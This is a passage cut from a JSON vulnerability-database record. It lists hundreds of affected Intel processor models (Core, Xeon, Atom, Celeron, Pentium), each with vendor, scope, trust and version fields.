        "version": "4116t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2557m"
      },
      {
        "model": "core m7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y75"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620lm"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5506"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6267u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7540"
      },
      {
        "model": "xeon e3 1260l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3840qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5250u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2357m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670k"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2760"
      },
      {
        "model": "xeon e3 1225 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2930"
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3825"
      },
      {
        "model": "xeon e3 1245 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2609 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2643",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v4"
      },
      {
        "model": "xeon e5 2448l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3805"
      },
      {
        "model": "xeon e5 2609 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3580"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6287u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v3"
      },
      {
        "model": "xeon e5 1660 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6540"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v6"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5020u"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3955"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "970"
      },
      {
        "model": "xeon e5 2403 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2643 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500te"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110e"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5647"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920xm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120me"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5015u"
      },
      {
        "model": "xeon e5 2407",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2537m"
      },
      {
        "model": "xeon e3 1501l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4220y"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650l"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7560"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100te"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5549"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300m"
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3826"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100e"
      },
      {
        "model": "xeon e5 2470",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700ec"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2810"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850hq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735g"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770k"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2320"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2530"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600s"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3480"
      },
      {
        "model": "xeon e5 2650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y71"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3245"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4410e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6685r"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5560"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5650"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520e"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v3"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3450"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5575r"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2550k"
      },
      {
        "model": "xeon e5 2430",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736g"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2803"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600m"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100t"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3795"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700mq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4202y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7660u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5005u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v2"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qe"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5672"
      },
      {
        "model": "xeon e5 2430 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4250u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7920hq"
      },
      {
        "model": "xeon e3 1245",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3437u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4720hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v2"
      },
      {
        "model": "xeon e5 2650l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310m"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2518"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1900"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699a_v4"
      },
      {
        "model": "xeon e5 2603 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2628l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1278l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160f"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702hq"
      },
      {
        "model": "xeon e5 2620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6144"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3200rk"
      },
      {
        "model": "xeon e3 1240 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y54"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350t"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7210f"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3130m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qm"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10a"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5570"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2405s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550s"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5660"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4640_v4"
      },
      {
        "model": "xeon e5 2643 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010y"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8153"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3130"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3689y"
      },
      {
        "model": "xeon e3 1270",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v3"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3708"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "840qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v4"
      },
      {
        "model": "xeon e3 1245 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2408l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2358"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2710qe"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3540"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v4"
      },
      {
        "model": "xeon e5 2428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2650l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2375m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200h"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7542"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620"
      },
      {
        "model": "xeon e5 2640",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4810mq"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2920"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210h"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "370m"
      },
      {
        "model": "xeon e5 1680 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112e"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3060"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697a_v4"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6152"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350h"
      },
      {
        "model": "xeon e3 1220l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3745"
      },
      {
        "model": "xeon e5 2428l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5640"
      },
      {
        "model": "xeon e5 2637 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2677m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5500u"
      },
      {
        "model": "xeon e3 1240 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4617"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v4"
      },
      {
        "model": "xeon e3 1275 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1225",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600k"
      },
      {
        "model": "xeon e3 1275l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "975"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4000m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920"
      },
      {
        "model": "xeon e5 2637 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3450"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600"
      },
      {
        "model": "xeon e5 2650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8164"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5530"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v4"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3808"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8158"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4260u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6360u"
      },
      {
        "model": "xeon e3 1220 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v3"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3538"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2760qm"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3710"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2300"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2508"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3445"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7235"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3670"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4114"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710mq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735e"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5680"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2460"
      },
      {
        "model": "xeon e5 2620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610me"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6130t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3475s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8600k"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3775d"
      },
      {
        "model": "xeon e3 1125c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4005u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2610ue"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517ue"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330t"
      },
      {
        "model": "core i5",
